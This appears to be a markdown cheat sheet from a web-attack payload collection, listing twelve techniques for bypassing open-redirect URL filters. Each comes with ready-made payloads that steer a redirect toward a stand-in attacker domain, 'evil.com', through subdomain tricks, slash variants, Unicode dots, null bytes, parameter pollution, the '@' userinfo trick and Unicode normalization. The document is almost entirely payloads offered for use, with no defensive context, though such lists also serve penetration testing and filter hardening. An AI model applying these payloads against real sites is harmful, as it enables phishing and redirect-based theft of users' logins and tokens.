## Filter Bypass 1. Using a whitelisted domain or keyword ``` target.com.evil.com ``` 2. Using "//" to bypass "http" blacklisted keyword ``` //evil.com ``` 3. Using "https:" to bypass "//" blacklisted keyword ``` https:evil.com ``` 4. Using "\/\/" to bypass "//" blacklisted keyword (Browsers see \/\/ as //) ``` \/\/evil.com/ /\/evil.com/ ``` 5. Using "%E3%80%82" to bypass "." blacklisted character ``` /?redir=evil。com /?redir=evil%E3%80%82com ``` 6. Using null byte "%00" to bypass blacklist filter ``` //evil%00.com ``` 7. Using parameter pollution ``` ?next=target.com&next=evil.com ``` 8. Using "@" character, browser will redirect to anything after the "@" ``` target.com@evil.com target.com%40evil.com ``` 9. Creating folder as their domain ``` http://www.yoursite.com/http://www.theirsite.com/ http://www.yoursite.com/folder/www.folder.com ``` 10. Using "?" characted, browser will translate it to "/?" ``` http://www.yoursite.com?http://www.theirsite.com/ http://www.yoursite.com?folder/www.folder.com ``` 11. Host/Split Unicode Normalization ``` https://evil.c℀.example.com ``` 12. Using parsing ``` http://ⓔⓥⓘⓛ.ⓒⓞⓜ ```